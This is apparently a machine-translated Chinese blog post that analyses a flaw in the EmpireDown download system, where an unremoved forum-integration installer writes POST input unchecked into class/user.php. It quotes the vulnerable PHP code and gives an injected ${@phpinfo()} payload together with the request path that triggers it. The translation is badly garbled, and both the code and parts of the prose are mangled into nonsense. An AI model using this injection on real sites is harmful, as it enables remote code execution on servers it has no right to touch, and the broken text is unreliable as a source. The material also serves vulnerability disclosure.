This is an empire Download System.
Ps (directly write shell without any account or password)
Text: Xidu
Because many websites have to integrate discuz and other forums for download ....
The Empire has 10 thousand million interfaces,
This interface will not be deleted by many people, resulting in a great security risk, resulting in direct getshell. The following analyzes the code
When we submit, the address is submitted to index. php? Install = 1 & setup = SetConfig
Www.2cto.com
If ($ _ GET ['install'] = 1) {@ include (".. /class/connect. php "); @ include (".. /class/db_ SQL .php "); @ include (".. /class/functions. php "); $ link = db_connect (); $ empire = new mysqlquery (); if ($ setup =" SetConfig ") {SetUserCOMConfig ($ _ POST );} elseif ($ setup = "alter") {InstallUserCOM ();} elseif ($ setup = "update") {UpdateUserCOM ();} else {}
He started calling a SetUserCOMConfig function here, and we will continue to trace it.
15 rows in data/fun. php
We can see this function
Function SetUserCOMConfig ($ add ){
$ Filetext = ReadFiletext ('data/user. php ');
If (empty ($ filetext ))
{
InstallShowMsg ('file/update/data/user. php is lost and installation fails .');
}
$ Vr = explode (",", ReturnRepUserVar ());
$ Count = count ($ vr );
For ($ I = 0; $ I <$ count; $ I ++)
{
$ Filetext = str_replace ("[! @ -- ". $ Vr [$ I]." -- @!] ", $ Add [$ vr [$ I], $ filetext );
}
// Write the configuration file
$ Fp = @ fopen ("../class/user. php", "w ");
If (! $ Fp)
{
InstallShowMsg ('/class/user. php file permission is not set to 0777, the installation is not successful .');
}
@ Fputs ($ fp, $ filetext );
@ Fclose ($ fp );
... // Omitted
Here he will $ filetext = str_replace ("[! @ -- ". $ Vr [$ I]." -- @!] ", $ Add [$ vr [$ I], $ filetext );
He cut the passed variables and assigned them to $ filetext.
See the following
// Write the configuration file
$ Fp = @ fopen ("../class/user. php", "w ");
If (! $ Fp)
{
InstallShowMsg ('/class/user. php file permission is not set to 0777, the installation is not successful .');
}
@ Fputs ($ fp, $ filetext );
Open a class/user. php file and write $ filetext
The transcript does not indicate the author's, rotten jj
Let's take a look at the Write result. Just enter one
Then he writes it to class/user. php, So 0-day is generated.
So let's write $ {@ phpinfo ()} to try it out.
The transcript does not indicate the author's, rotten jj
Access the following class/user. php file.
Mjj does not reply
Day